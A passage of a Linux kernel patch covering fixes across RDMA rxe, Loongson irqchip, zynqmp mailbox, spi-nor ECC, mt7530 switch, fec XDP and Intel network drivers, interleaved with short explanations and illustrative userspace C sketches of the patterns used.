++	err = rxe_add_to_pool(&rxe->mr_pool, mr);
++	if (err)
++		goto err_free;
+ 
+ 	rxe_get(pd);
+ 	mr->ibmr.pd = ibpd;
+@@ -903,14 +920,16 @@ static struct ib_mr *rxe_reg_user_mr(struct ib_pd *ibpd,
+ 
+ 	err = rxe_mr_init_user(rxe, start, length, iova, access, mr);
+ 	if (err)
+-		goto err1;
++		goto err_cleanup;
+ 
+ 	rxe_finalize(mr);
+-
+ 	return &mr->ibmr;
+ 
+-err1:
++err_cleanup:
+ 	rxe_cleanup(mr);
++err_free:
++	kfree(mr);
++err_out:
+ 	return ERR_PTR(err);
+ }
+ 
+@@ -925,9 +944,15 @@ static struct ib_mr *rxe_alloc_mr(struct ib_pd *ibpd, enum ib_mr_type mr_type,
+ 	if (mr_type != IB_MR_TYPE_MEM_REG)
+ 		return ERR_PTR(-EINVAL);
+ 
+-	mr = rxe_alloc(&rxe->mr_pool);
+-	if (!mr)
+-		return ERR_PTR(-ENOMEM);
++	mr = kzalloc(sizeof(*mr), GFP_KERNEL);
++	if (!mr) {
++		err = -ENOMEM;
++		goto err_out;
++	}
++
++	err = rxe_add_to_pool(&rxe->mr_pool, mr);
++	if (err)
++		goto err_free;
+ 
+ 	rxe_get(pd);
+ 	mr->ibmr.pd = ibpd;
+@@ -935,14 +960,16 @@ static struct ib_mr *rxe_alloc_mr(struct ib_pd *ibpd, enum ib_mr_type mr_type,
+ 
+ 	err = rxe_mr_init_fast(max_num_sg, mr);
+ 	if (err)
+-		goto err1;
++		goto err_cleanup;
+ 
+ 	rxe_finalize(mr);
+-
+ 	return &mr->ibmr;
+ 
+-err1:
++err_cleanup:
+ 	rxe_cleanup(mr);
++err_free:
++	kfree(mr);
++err_out:
+ 	return ERR_PTR(err);
+ }
+ 
+@@ -1066,7 +1093,7 @@ int rxe_register_device(struct rxe_dev *rxe, const char *ibdev_name)
+ 
+ 	err = ib_register_device(dev, ibdev_name, NULL);
+ 	if (err)
+-		rxe_dbg(rxe, "failed with error %d\n", err);
++		rxe_dbg_dev(rxe, "failed with error %d\n", err);
+ 
+ 	/*
+ 	 * Note that rxe may be invalid at this point if another thread
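
The three rxe_verbs.c hunks above replace rxe_alloc() with the same open-coded sequence: kzalloc the MR, add it to the pool, initialize it, and unwind in reverse order on failure before returning the error. A compilable userspace sketch of that unwind ordering; pool_add(), pool_del() and init_obj() are illustrative stand-ins for rxe_add_to_pool(), rxe_cleanup() and the MR init helpers.

#include <stdlib.h>
#include <stdio.h>
#include <errno.h>

struct pool {
	int nelem, max;
};

static int pool_add(struct pool *p)
{
	if (p->nelem >= p->max)
		return -ENOSPC;
	p->nelem++;
	return 0;
}

static void pool_del(struct pool *p)
{
	p->nelem--;
}

static int init_obj(void *obj)
{
	return obj ? 0 : -EINVAL;	/* pretend initialization succeeded */
}

static void *alloc_obj(struct pool *p, int *err)
{
	void *obj = calloc(1, 64);

	if (!obj) {
		*err = -ENOMEM;
		goto err_out;
	}
	*err = pool_add(p);
	if (*err)
		goto err_free;
	*err = init_obj(obj);
	if (*err)
		goto err_cleanup;
	return obj;

err_cleanup:
	pool_del(p);		/* undo in reverse order */
err_free:
	free(obj);
err_out:
	return NULL;
}

int main(void)
{
	struct pool p = { .max = 1 };
	int err = 0;
	void *obj = alloc_obj(&p, &err);

	printf("first alloc: %s\n", obj ? "ok" : "failed");
	if (!alloc_obj(&p, &err))
		printf("second alloc failed: %d\n", err);	/* pool full */
	pool_del(&p);
	free(obj);
	return 0;
}
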
+diff --git a/drivers/irqchip/irq-loongson-eiointc.c b/drivers/irqchip/irq-loongson-eiointc.c
+index d15fd38c17568..90181c42840b4 100644
+--- a/drivers/irqchip/irq-loongson-eiointc.c
++++ b/drivers/irqchip/irq-loongson-eiointc.c
+@@ -280,9 +280,6 @@ static void acpi_set_vec_parent(int node, struct irq_domain *parent, struct acpi
+ {
+ 	int i;
+ 
+-	if (cpu_has_flatmode)
+-		node = cpu_to_node(node * CORES_PER_EIO_NODE);
+-
+ 	for (i = 0; i < MAX_IO_PICS; i++) {
+ 		if (node == vec_group[i].node) {
+ 			vec_group[i].parent = parent;
+@@ -343,19 +340,27 @@ static int __init pch_pic_parse_madt(union acpi_subtable_headers *header,
+ 	if (parent)
+ 		return pch_pic_acpi_init(parent, pchpic_entry);
+ 
+-	return -EINVAL;
++	return 0;
+ }
+ 
+ static int __init pch_msi_parse_madt(union acpi_subtable_headers *header,
+ 					const unsigned long end)
+ {
++	struct irq_domain *parent;
+ 	struct acpi_madt_msi_pic *pchmsi_entry = (struct acpi_madt_msi_pic *)header;
+-	struct irq_domain *parent = acpi_get_vec_parent(eiointc_priv[nr_pics - 1]->node, msi_group);
++	int node;
++
++	if (cpu_has_flatmode)
++		node = cpu_to_node(eiointc_priv[nr_pics - 1]->node * CORES_PER_EIO_NODE);
++	else
++		node = eiointc_priv[nr_pics - 1]->node;
++
++	parent = acpi_get_vec_parent(node, msi_group);
+ 
+ 	if (parent)
+ 		return pch_msi_acpi_init(parent, pchmsi_entry);
+ 
+-	return -EINVAL;
++	return 0;
+ }
+ 
+ static int __init acpi_cascade_irqdomain_init(void)
+@@ -379,6 +384,7 @@ int __init eiointc_acpi_init(struct irq_domain *parent,
+ 	int i, ret, parent_irq;
+ 	unsigned long node_map;
+ 	struct eiointc_priv *priv;
++	int node;
+ 
+ 	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+ 	if (!priv)
+@@ -416,13 +422,19 @@ int __init eiointc_acpi_init(struct irq_domain *parent,
+ 	parent_irq = irq_create_mapping(parent, acpi_eiointc->cascade);
+ 	irq_set_chained_handler_and_data(parent_irq, eiointc_irq_dispatch, priv);
+ 
+-	register_syscore_ops(&eiointc_syscore_ops);
+-	cpuhp_setup_state_nocalls(CPUHP_AP_IRQ_LOONGARCH_STARTING,
++	if (nr_pics == 1) {
++		register_syscore_ops(&eiointc_syscore_ops);
++		cpuhp_setup_state_nocalls(CPUHP_AP_IRQ_LOONGARCH_STARTING,
+ 				  "irqchip/loongarch/intc:starting",
+ 				  eiointc_router_init, NULL);
++	}
+ 
+-	acpi_set_vec_parent(acpi_eiointc->node, priv->eiointc_domain, pch_group);
+-	acpi_set_vec_parent(acpi_eiointc->node, priv->eiointc_domain, msi_group);
++	if (cpu_has_flatmode)
++		node = cpu_to_node(acpi_eiointc->node * CORES_PER_EIO_NODE);
++	else
++		node = acpi_eiointc->node;
++	acpi_set_vec_parent(node, priv->eiointc_domain, pch_group);
++	acpi_set_vec_parent(node, priv->eiointc_domain, msi_group);
+ 	ret = acpi_cascade_irqdomain_init();
+ 
+ 	return ret;
+diff --git a/drivers/irqchip/irq-loongson-pch-pic.c b/drivers/irqchip/irq-loongson-pch-pic.c
+index 437f1af693d01..e5fe4d50be056 100644
+--- a/drivers/irqchip/irq-loongson-pch-pic.c
++++ b/drivers/irqchip/irq-loongson-pch-pic.c
+@@ -311,7 +311,8 @@ static int pch_pic_init(phys_addr_t addr, unsigned long size, int vec_base,
+ 	pch_pic_handle[nr_pics] = domain_handle;
+ 	pch_pic_priv[nr_pics++] = priv;
+ 
+-	register_syscore_ops(&pch_pic_syscore_ops);
++	if (nr_pics == 1)
++		register_syscore_ops(&pch_pic_syscore_ops);
+ 
+ 	return 0;
+ 
+@@ -403,6 +404,9 @@ int __init pch_pic_acpi_init(struct irq_domain *parent,
+ 	int ret, vec_base;
+ 	struct fwnode_handle *domain_handle;
+ 
++	if (find_pch_pic(acpi_pchpic->gsi_base) >= 0)
++		return 0;
++
+ 	vec_base = acpi_pchpic->gsi_base - GSI_MIN_PCH_IRQ;
+ 
+ 	domain_handle = irq_domain_alloc_fwnode(&acpi_pchpic->address);
+diff --git a/drivers/mailbox/zynqmp-ipi-mailbox.c b/drivers/mailbox/zynqmp-ipi-mailbox.c
+index e02a4a18e8c29..d097f45b0e5f5 100644
+--- a/drivers/mailbox/zynqmp-ipi-mailbox.c
++++ b/drivers/mailbox/zynqmp-ipi-mailbox.c
+@@ -110,7 +110,7 @@ struct zynqmp_ipi_pdata {
+ 	unsigned int method;
+ 	u32 local_id;
+ 	int num_mboxes;
+-	struct zynqmp_ipi_mbox *ipi_mboxes;
++	struct zynqmp_ipi_mbox ipi_mboxes[];
+ };
+ 
+ static struct device_driver zynqmp_ipi_mbox_driver = {
+@@ -634,8 +634,13 @@ static int zynqmp_ipi_probe(struct platform_device *pdev)
+ 	struct zynqmp_ipi_mbox *mbox;
+ 	int num_mboxes, ret = -EINVAL;
+ 
+-	num_mboxes = of_get_child_count(np);
+-	pdata = devm_kzalloc(dev, sizeof(*pdata) + (num_mboxes * sizeof(*mbox)),
++	num_mboxes = of_get_available_child_count(np);
++	if (num_mboxes == 0) {
++		dev_err(dev, "mailbox nodes not available\n");
++		return -EINVAL;
++	}
++
++	pdata = devm_kzalloc(dev, struct_size(pdata, ipi_mboxes, num_mboxes),
+ 			     GFP_KERNEL);
+ 	if (!pdata)
+ 		return -ENOMEM;
+@@ -649,8 +654,6 @@ static int zynqmp_ipi_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	pdata->num_mboxes = num_mboxes;
+-	pdata->ipi_mboxes = (struct zynqmp_ipi_mbox *)
+-			    ((char *)pdata + sizeof(*pdata));
+ 
+ 	mbox = pdata->ipi_mboxes;
+ 	for_each_available_child_of_node(np, nc) {
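
The zynqmp-ipi hunk above turns ipi_mboxes into a flexible array member and sizes the allocation with struct_size(), replacing the hand-written sizeof arithmetic and the pointer cast that followed it. A userspace model of the pattern; struct_size() is approximated here, while the kernel macro additionally checks for multiplication overflow.

#include <stdlib.h>
#include <stdio.h>

struct mbox {
	int id;
};

struct pdata {
	int num_mboxes;
	struct mbox ipi_mboxes[];	/* flexible array member */
};

/* Simplified stand-in for the kernel's overflow-checked struct_size() */
#define struct_size(p, member, n) \
	(sizeof(*(p)) + (n) * sizeof((p)->member[0]))

int main(void)
{
	int n = 3;
	struct pdata *pdata = calloc(1, struct_size(pdata, ipi_mboxes, n));

	if (!pdata)
		return 1;
	pdata->num_mboxes = n;
	for (int i = 0; i < n; i++)
		pdata->ipi_mboxes[i].id = i;	/* no cast or offset math */
	printf("last mbox id %d\n", pdata->ipi_mboxes[n - 1].id);
	free(pdata);
	return 0;
}
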
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index bf50a35db711e..d75db50767938 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -2471,6 +2471,9 @@ static void spi_nor_init_flags(struct spi_nor *nor)
+ 
+ 	if (flags & NO_CHIP_ERASE)
+ 		nor->flags |= SNOR_F_NO_OP_CHIP_ERASE;
++
++	if (flags & SPI_NOR_RWW)
++		nor->flags |= SNOR_F_RWW;
+ }
+ 
+ /**
+@@ -2980,6 +2983,9 @@ static void spi_nor_set_mtd_info(struct spi_nor *nor)
+ 		mtd->name = dev_name(dev);
+ 	mtd->type = MTD_NORFLASH;
+ 	mtd->flags = MTD_CAP_NORFLASH;
++	/* Unset MTD_BIT_WRITEABLE to enable JFFS2 write buffer for ECC'd NOR */
++	if (nor->flags & SNOR_F_ECC)
++		mtd->flags &= ~MTD_BIT_WRITEABLE;
+ 	if (nor->info->flags & SPI_NOR_NO_ERASE)
+ 		mtd->flags |= MTD_NO_ERASE;
+ 	else
+diff --git a/drivers/mtd/spi-nor/core.h b/drivers/mtd/spi-nor/core.h
+index f4246c52a1def..75ec2e5604247 100644
+--- a/drivers/mtd/spi-nor/core.h
++++ b/drivers/mtd/spi-nor/core.h
+@@ -130,6 +130,8 @@ enum spi_nor_option_flags {
+ 	SNOR_F_IO_MODE_EN_VOLATILE = BIT(11),
+ 	SNOR_F_SOFT_RESET	= BIT(12),
+ 	SNOR_F_SWP_IS_VOLATILE	= BIT(13),
++	SNOR_F_RWW		= BIT(14),
++	SNOR_F_ECC		= BIT(15),
+ };
+ 
+ struct spi_nor_read_command {
+@@ -459,6 +461,7 @@ struct spi_nor_fixups {
+  *   NO_CHIP_ERASE:           chip does not support chip erase.
+  *   SPI_NOR_NO_FR:           can't do fastread.
+  *   SPI_NOR_QUAD_PP:         flash supports Quad Input Page Program.
++ *   SPI_NOR_RWW:             flash supports read while write.
+  *
+  * @no_sfdp_flags:  flags that indicate support that can be discovered via SFDP.
+  *                  Used when SFDP tables are not defined in the flash. These
+@@ -509,6 +512,7 @@ struct flash_info {
+ #define NO_CHIP_ERASE			BIT(7)
+ #define SPI_NOR_NO_FR			BIT(8)
+ #define SPI_NOR_QUAD_PP			BIT(9)
++#define SPI_NOR_RWW			BIT(10)
+ 
+ 	u8 no_sfdp_flags;
+ #define SPI_NOR_SKIP_SFDP		BIT(0)
+diff --git a/drivers/mtd/spi-nor/debugfs.c b/drivers/mtd/spi-nor/debugfs.c
+index 558ffecf8ae6d..285bdcbaa1134 100644
+--- a/drivers/mtd/spi-nor/debugfs.c
++++ b/drivers/mtd/spi-nor/debugfs.c
+@@ -25,6 +25,8 @@ static const char *const snor_f_names[] = {
+ 	SNOR_F_NAME(IO_MODE_EN_VOLATILE),
+ 	SNOR_F_NAME(SOFT_RESET),
+ 	SNOR_F_NAME(SWP_IS_VOLATILE),
++	SNOR_F_NAME(RWW),
++	SNOR_F_NAME(ECC),
+ };
+ #undef SNOR_F_NAME
+ 
+diff --git a/drivers/mtd/spi-nor/spansion.c b/drivers/mtd/spi-nor/spansion.c
+index 07fe0f6fdfe3e..aef085b476deb 100644
+--- a/drivers/mtd/spi-nor/spansion.c
++++ b/drivers/mtd/spi-nor/spansion.c
+@@ -218,6 +218,17 @@ static int cypress_nor_set_page_size(struct spi_nor *nor)
+ 	return 0;
+ }
+ 
++static void cypress_nor_ecc_init(struct spi_nor *nor)
++{
++	/*
++	 * Programming is supported only in 16-byte ECC data unit granularity.
++	 * Byte-programming, bit-walking, or multiple program operations to the
++	 * same ECC data unit without an erase are not allowed.
++	 */
++	nor->params->writesize = 16;
++	nor->flags |= SNOR_F_ECC;
++}
++
+ static int
+ s25hx_t_post_bfpt_fixup(struct spi_nor *nor,
+ 			const struct sfdp_parameter_header *bfpt_header,
+@@ -255,13 +266,10 @@ static void s25hx_t_post_sfdp_fixup(struct spi_nor *nor)
+ 
+ static void s25hx_t_late_init(struct spi_nor *nor)
+ {
+-	struct spi_nor_flash_parameter *params = nor->params;
+-
+ 	/* Fast Read 4B requires mode cycles */
+-	params->reads[SNOR_CMD_READ_FAST].num_mode_clocks = 8;
++	nor->params->reads[SNOR_CMD_READ_FAST].num_mode_clocks = 8;
+ 
+-	/* The writesize should be ECC data unit size */
+-	params->writesize = 16;
++	cypress_nor_ecc_init(nor);
+ }
+ 
+ static struct spi_nor_fixups s25hx_t_fixups = {
+@@ -324,7 +332,7 @@ static int s28hx_t_post_bfpt_fixup(struct spi_nor *nor,
+ static void s28hx_t_late_init(struct spi_nor *nor)
+ {
+ 	nor->params->octal_dtr_enable = cypress_nor_octal_dtr_enable;
+-	nor->params->writesize = 16;
++	cypress_nor_ecc_init(nor);
+ }
+ 
+ static const struct spi_nor_fixups s28hx_t_fixups = {
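
Both Cypress late_init hooks above now share cypress_nor_ecc_init(), which pins writesize to the 16-byte ECC data unit because programming anything smaller would touch an ECC unit twice without an erase. A toy sketch of what that granularity means for a write path; the alignment helpers are invented for illustration.

#include <stdio.h>

#define ECC_UNIT 16	/* smallest programmable granule on these parts */

static unsigned int align_down(unsigned int x)
{
	return x & ~(ECC_UNIT - 1);
}

static unsigned int align_up(unsigned int x)
{
	return (x + ECC_UNIT - 1) & ~(ECC_UNIT - 1);
}

int main(void)
{
	unsigned int off = 10, len = 20;
	unsigned int start = align_down(off);
	unsigned int end = align_up(off + len);

	/* A buffering layer (e.g. JFFS2's write buffer) would program
	 * the whole [start, end) span so no ECC unit is written twice. */
	printf("program [%u, %u) as whole ECC units\n", start, end);
	return 0;
}
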
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 326f992536a7e..69b6a9265e4e4 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -446,9 +446,9 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 		else
+ 			ssc_delta = 0x87;
+ 		if (priv->id == ID_MT7621) {
+-			/* PLL frequency: 150MHz: 1.2GBit */
++			/* PLL frequency: 125MHz: 1.0GBit */
+ 			if (xtal == HWTRAP_XTAL_40MHZ)
+-				ncpo1 = 0x0780;
++				ncpo1 = 0x0640;
+ 			if (xtal == HWTRAP_XTAL_25MHZ)
+ 				ncpo1 = 0x0a00;
+ 		} else { /* PLL frequency: 250MHz: 2.0Gbit */
+@@ -1015,9 +1015,9 @@ mt753x_cpu_port_enable(struct dsa_switch *ds, int port)
+ 	mt7530_write(priv, MT7530_PVC_P(port),
+ 		     PORT_SPEC_TAG);
+ 
+-	/* Disable flooding by default */
+-	mt7530_rmw(priv, MT7530_MFC, BC_FFP_MASK | UNM_FFP_MASK | UNU_FFP_MASK,
+-		   BC_FFP(BIT(port)) | UNM_FFP(BIT(port)) | UNU_FFP(BIT(port)));
++	/* Enable flooding on the CPU port */
++	mt7530_set(priv, MT7530_MFC, BC_FFP(BIT(port)) | UNM_FFP(BIT(port)) |
++		   UNU_FFP(BIT(port)));
+ 
+ 	/* Set CPU port number */
+ 	if (priv->id == ID_MT7621)
+@@ -2312,12 +2312,69 @@ mt7530_setup(struct dsa_switch *ds)
+ 	return 0;
+ }
+ 
++static int
++mt7531_setup_common(struct dsa_switch *ds)
++{
++	struct mt7530_priv *priv = ds->priv;
++	struct dsa_port *cpu_dp;
++	int ret, i;
++
++	/* BPDU to CPU port */
++	dsa_switch_for_each_cpu_port(cpu_dp, ds) {
++		mt7530_rmw(priv, MT7531_CFC, MT7531_CPU_PMAP_MASK,
++			   BIT(cpu_dp->index));
++		break;
++	}
++	mt7530_rmw(priv, MT753X_BPC, MT753X_BPDU_PORT_FW_MASK,
++		   MT753X_BPDU_CPU_ONLY);
++
++	/* Enable and reset MIB counters */
++	mt7530_mib_reset(ds);
++
++	/* Disable flooding on all ports */
++	mt7530_clear(priv, MT7530_MFC, BC_FFP_MASK | UNM_FFP_MASK |
++		     UNU_FFP_MASK);
++
++	for (i = 0; i < MT7530_NUM_PORTS; i++) {
++		/* Disable forwarding by default on all ports */
++		mt7530_rmw(priv, MT7530_PCR_P(i), PCR_MATRIX_MASK,
++			   PCR_MATRIX_CLR);
++
++		/* Disable learning by default on all ports */
++		mt7530_set(priv, MT7530_PSC_P(i), SA_DIS);
++
++		mt7530_set(priv, MT7531_DBG_CNT(i), MT7531_DIS_CLR);
++
++		if (dsa_is_cpu_port(ds, i)) {
++			ret = mt753x_cpu_port_enable(ds, i);
++			if (ret)
++				return ret;
++		} else {
++			mt7530_port_disable(ds, i);
++
++			/* Set default PVID to 0 on all user ports */
++			mt7530_rmw(priv, MT7530_PPBV1_P(i), G0_PORT_VID_MASK,
++				   G0_PORT_VID_DEF);
++		}
++
++		/* Enable consistent egress tag */
++		mt7530_rmw(priv, MT7530_PVC_P(i), PVC_EG_TAG_MASK,
++			   PVC_EG_TAG(MT7530_VLAN_EG_CONSISTENT));
++	}
++
++	/* Flush the FDB table */
++	ret = mt7530_fdb_cmd(priv, MT7530_FDB_FLUSH, NULL);
++	if (ret < 0)
++		return ret;
++
++	return 0;
++}
++
+ static int
+ mt7531_setup(struct dsa_switch *ds)
+ {
+ 	struct mt7530_priv *priv = ds->priv;
+ 	struct mt7530_dummy_poll p;
+-	struct dsa_port *cpu_dp;
+ 	u32 val, id;
+ 	int ret, i;
+ 
+@@ -2395,44 +2452,7 @@ mt7531_setup(struct dsa_switch *ds)
+ 	mt7531_ind_c45_phy_write(priv, MT753X_CTRL_PHY_ADDR, MDIO_MMD_VEND2,
+ 				 CORE_PLL_GROUP4, val);
+ 
+-	/* BPDU to CPU port */
+-	dsa_switch_for_each_cpu_port(cpu_dp, ds) {
+-		mt7530_rmw(priv, MT7531_CFC, MT7531_CPU_PMAP_MASK,
+-			   BIT(cpu_dp->index));
+-		break;
+-	}
+-	mt7530_rmw(priv, MT753X_BPC, MT753X_BPDU_PORT_FW_MASK,
+-		   MT753X_BPDU_CPU_ONLY);
+-
+-	/* Enable and reset MIB counters */
+-	mt7530_mib_reset(ds);
+-
+-	for (i = 0; i < MT7530_NUM_PORTS; i++) {
+-		/* Disable forwarding by default on all ports */
+-		mt7530_rmw(priv, MT7530_PCR_P(i), PCR_MATRIX_MASK,
+-			   PCR_MATRIX_CLR);
+-
+-		/* Disable learning by default on all ports */
+-		mt7530_set(priv, MT7530_PSC_P(i), SA_DIS);
+-
+-		mt7530_set(priv, MT7531_DBG_CNT(i), MT7531_DIS_CLR);
+-
+-		if (dsa_is_cpu_port(ds, i)) {
+-			ret = mt753x_cpu_port_enable(ds, i);
+-			if (ret)
+-				return ret;
+-		} else {
+-			mt7530_port_disable(ds, i);
+-
+-			/* Set default PVID to 0 on all user ports */
+-			mt7530_rmw(priv, MT7530_PPBV1_P(i), G0_PORT_VID_MASK,
+-				   G0_PORT_VID_DEF);
+-		}
+-
+-		/* Enable consistent egress tag */
+-		mt7530_rmw(priv, MT7530_PVC_P(i), PVC_EG_TAG_MASK,
+-			   PVC_EG_TAG(MT7530_VLAN_EG_CONSISTENT));
+-	}
++	mt7531_setup_common(ds);
+ 
+ 	/* Setup VLAN ID 0 for VLAN-unaware bridges */
+ 	ret = mt7530_setup_vlan0(priv);
+@@ -2442,11 +2462,6 @@ mt7531_setup(struct dsa_switch *ds)
+ 	ds->assisted_learning_on_cpu_port = true;
+ 	ds->mtu_enforcement_ingress = true;
+ 
+-	/* Flush the FDB table */
+-	ret = mt7530_fdb_cmd(priv, MT7530_FDB_FLUSH, NULL);
+-	if (ret < 0)
+-		return ret;
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index e57d86484a3a4..9959262ebad2c 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -5113,6 +5113,7 @@ static const struct mv88e6xxx_ops mv88e6321_ops = {
+ 	.set_cpu_port = mv88e6095_g1_set_cpu_port,
+ 	.set_egress_port = mv88e6095_g1_set_egress_port,
+ 	.watchdog_ops = &mv88e6390_watchdog_ops,
++	.mgmt_rsvd2cpu = mv88e6352_g2_mgmt_rsvd2cpu,
+ 	.reset = mv88e6352_g1_reset,
+ 	.vtu_getnext = mv88e6185_g1_vtu_getnext,
+ 	.vtu_loadpurge = mv88e6185_g1_vtu_loadpurge,
+diff --git a/drivers/net/ethernet/freescale/enetc/enetc_qos.c b/drivers/net/ethernet/freescale/enetc/enetc_qos.c
+index fcebb54224c09..a8539a8554a13 100644
+--- a/drivers/net/ethernet/freescale/enetc/enetc_qos.c
++++ b/drivers/net/ethernet/freescale/enetc/enetc_qos.c
+@@ -1255,7 +1255,7 @@ static int enetc_psfp_parse_clsflower(struct enetc_ndev_priv *priv,
+ 		int index;
+ 
+ 		index = enetc_get_free_index(priv);
+-		if (sfi->handle < 0) {
++		if (index < 0) {
+ 			NL_SET_ERR_MSG_MOD(extack, "No Stream Filter resource!");
+ 			err = -ENOSPC;
+ 			goto free_fmi;
+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index 2341597408d12..5fd3b41319827 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -3737,7 +3737,8 @@ static int fec_enet_txq_xmit_frame(struct fec_enet_private *fep,
+ 	entries_free = fec_enet_get_free_txdesc_num(txq);
+ 	if (entries_free < MAX_SKB_FRAGS + 1) {
+ 		netdev_err(fep->netdev, "NOT enough BD for SG!\n");
+-		return NETDEV_TX_OK;
++		xdp_return_frame(frame);
++		return NETDEV_TX_BUSY;
+ 	}
+ 
+ 	/* Fill in a Tx ring entry */
+@@ -3795,6 +3796,7 @@ static int fec_enet_xdp_xmit(struct net_device *dev,
+ 	struct fec_enet_private *fep = netdev_priv(dev);
+ 	struct fec_enet_priv_tx_q *txq;
+ 	int cpu = smp_processor_id();
++	unsigned int sent_frames = 0;
+ 	struct netdev_queue *nq;
+ 	unsigned int queue;
+ 	int i;
+@@ -3805,8 +3807,11 @@ static int fec_enet_xdp_xmit(struct net_device *dev,
+ 
+ 	__netif_tx_lock(nq, cpu);
+ 
+-	for (i = 0; i < num_frames; i++)
+-		fec_enet_txq_xmit_frame(fep, txq, frames[i]);
++	for (i = 0; i < num_frames; i++) {
++		if (fec_enet_txq_xmit_frame(fep, txq, frames[i]) != 0)
++			break;
++		sent_frames++;
++	}
+ 
+ 	/* Make sure the update to bdp and tx_skbuff are performed. */
+ 	wmb();
+@@ -3816,7 +3821,7 @@ static int fec_enet_xdp_xmit(struct net_device *dev,
+ 
+ 	__netif_tx_unlock(nq);
+ 
+-	return num_frames;
++	return sent_frames;
+ }
+ 
+ static const struct net_device_ops fec_netdev_ops = {
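
The fec hunks above make ndo_xdp_xmit report partial sends honestly: fec_enet_txq_xmit_frame() now returns the frame when the ring is full, and the caller stops at the first failure and returns only the count actually queued. A compact model of that loop; ring_space stands in for the BD ring accounting.

#include <stdio.h>

static int ring_space = 2;	/* pretend two descriptors are free */

static int xmit_frame(int frame)
{
	if (ring_space == 0)
		return -1;	/* ring full: caller keeps the frame */
	ring_space--;
	printf("queued frame %d\n", frame);
	return 0;
}

int main(void)
{
	int num_frames = 4, sent = 0;

	for (int i = 0; i < num_frames; i++) {
		if (xmit_frame(i) != 0)
			break;	/* stop at first failure */
		sent++;
	}
	/* report only what was queued, not num_frames */
	printf("sent %d of %d\n", sent, num_frames);
	return 0;
}
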
+diff --git a/drivers/net/ethernet/intel/ice/ice_tc_lib.c b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+index ce72d512eddf9..a9db9bdd72629 100644
+--- a/drivers/net/ethernet/intel/ice/ice_tc_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+@@ -693,17 +693,18 @@ ice_eswitch_add_tc_fltr(struct ice_vsi *vsi, struct ice_tc_flower_fltr *fltr)
+ 	 * results into order of switch rule evaluation.
+ 	 */
+ 	rule_info.priority = 7;
++	rule_info.flags_info.act_valid = true;
+ 
+ 	if (fltr->direction == ICE_ESWITCH_FLTR_INGRESS) {
+ 		rule_info.sw_act.flag |= ICE_FLTR_RX;
+ 		rule_info.sw_act.src = hw->pf_id;
+ 		rule_info.rx = true;
++		rule_info.flags_info.act = ICE_SINGLE_ACT_LB_ENABLE;
+ 	} else {
+ 		rule_info.sw_act.flag |= ICE_FLTR_TX;
+ 		rule_info.sw_act.src = vsi->idx;
+ 		rule_info.rx = false;
+ 		rule_info.flags_info.act = ICE_SINGLE_ACT_LAN_ENABLE;
+-		rule_info.flags_info.act_valid = true;
+ 	}
+ 
+ 	/* specify the cookie as filter_rule_id */
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_lib.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_lib.c
+index f8156fe4b1dc4..0ee943db3dc92 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_lib.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_lib.c
+@@ -1035,9 +1035,6 @@ static void ixgbe_free_q_vector(struct ixgbe_adapter *adapter, int v_idx)
+ 	adapter->q_vector[v_idx] = NULL;
+ 	__netif_napi_del(&q_vector->napi);
+ 
+-	if (static_key_enabled(&ixgbe_xdp_locking_key))
+-		static_branch_dec(&ixgbe_xdp_locking_key);
+-
+ 	/*
+ 	 * after a call to __netif_napi_del() napi may still be used and
+ 	 * ixgbe_get_stats64() might access the rings on this vector,
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+index 4507fba8747a7..03e583cf48153 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+@@ -6495,6 +6495,10 @@ static int ixgbe_sw_init(struct ixgbe_adapter *adapter,
+ 	set_bit(0, adapter->fwd_bitmask);
+ 	set_bit(__IXGBE_DOWN, &adapter->state);
+ 
++	/* enable locking for XDP_TX if we have more CPUs than queues */
++	if (nr_cpu_ids > IXGBE_MAX_XDP_QS)
++		static_branch_enable(&ixgbe_xdp_locking_key);
++
+ 	return 0;
+ }
+ 
+@@ -10288,8 +10292,6 @@ static int ixgbe_xdp_setup(struct net_device *dev, struct bpf_prog *prog)
+ 	 */
+ 	if (nr_cpu_ids > IXGBE_MAX_XDP_QS * 2)
+ 		return -ENOMEM;
+-	else if (nr_cpu_ids > IXGBE_MAX_XDP_QS)
+-		static_branch_inc(&ixgbe_xdp_locking_key);
+ 
+ 	old_prog = xchg(&adapter->xdp_prog, prog);
+ 	need_reset = (!!prog != !!old_prog);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+index 724df6398bbe2..bd77152bb8d7c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+@@ -1231,6 +1231,14 @@ static inline void link_status_user_format(u64 lstat,
+ 	linfo->an = FIELD_GET(RESP_LINKSTAT_AN, lstat);
+ 	linfo->fec = FIELD_GET(RESP_LINKSTAT_FEC, lstat);
+ 	linfo->lmac_type_id = FIELD_GET(RESP_LINKSTAT_LMAC_TYPE, lstat);
++
++	if (linfo->lmac_type_id >= LMAC_MODE_MAX) {
